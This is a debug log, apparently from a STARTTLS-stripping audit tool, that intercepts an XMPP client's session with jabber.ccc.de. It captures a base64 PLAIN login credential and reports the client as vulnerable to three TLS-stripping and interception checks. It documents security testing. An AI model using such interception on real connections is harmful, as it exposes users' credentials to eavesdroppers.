- DEBUG - <Session 0x7f083196a8d0> [client] => [server][mangled] performing outbound SSL handshake
- DEBUG - <Session 0x7f083196a8d0> [client] => [server][mangled] None
- DEBUG - <Session 0x7f083196a8d0> [client] => [server] '<'
- DEBUG - <Session 0x7f083196a8d0> [client] => [server] "stream:stream to='jabber.ccc.de' xmlns='jabber:client' xmlns:stream='http://etherx.jabber.org/streams' version='1.0'>"
- DEBUG - <Session 0x7f083196a8d0> [client] <= [server] "<?xml version='1.0'?><stream:stream xmlns='jabber:client' xmlns:stream='http://etherx.jabber.org/streams' id='6938642107398534259' from='jabber.ccc.de' version='1.0' xml:lang='en'>"
- DEBUG - <Session 0x7f083196a8d0> [client] <= [server] "<stream:features><c xmlns='http://jabber.org/protocol/caps' hash='sha-1' node='http://www.process-one.net/en/ejabberd/' ver='bvEOjW9q8CEw8mw8ecNTLXvY5WQ='/><register xmlns='http://jabber.org/features/iq-register'/><mechanisms xmlns='urn:ietf:params:xml:ns:xmpp-sasl'><mechanism>PLAIN</mechanism><mechanism>X-OAUTH2</mechanism><mechanism>SCRAM-SHA-1</mechanism></mechanisms></stream:features>"
- DEBUG - <Session 0x7f083196a8d0> [client] => [server] '<'
- DEBUG - <Session 0x7f083196a8d0> [client] => [server] "auth xmlns='urn:ietf:params:xml:ns:xmpp-sasl' mechanism='PLAIN' xmlns:ga='http://www.google.com/talk/protocol/auth' ga:client-uses-full-bind-result='true'>AHRpbgB4eA==</auth>"
- DEBUG - <Session 0x7f083196a8d0> [client] <= [server] "<failure xmlns='urn:ietf:params:xml:ns:xmpp-sasl'><not-authorized/></failure>"
- DEBUG - <Session 0x7f083196a8d0> [client] => [server] '<'
- DEBUG - <Session 0x7f083196a8d0> [client] => [server] '/stream:stream>'
- WARNING - <Session 0x7f083196a8d0> terminated.
#### Résultats de l'audit XMPP
- WARNING - Ctrl C - Stopping server
- INFO - -- audit results --
- INFO - [*] client: 192.168.139.1
- INFO - [Vulnerable!] <class striptls.StripInboundTLS at 0x7f08319a6808>
- INFO - [Vulnerable!] <class striptls.StripFromCapabilities at 0x7f08319a67a0>
- INFO - [Vulnerable!] <class striptls.UntrustedIntercept at 0x7f08319a6870>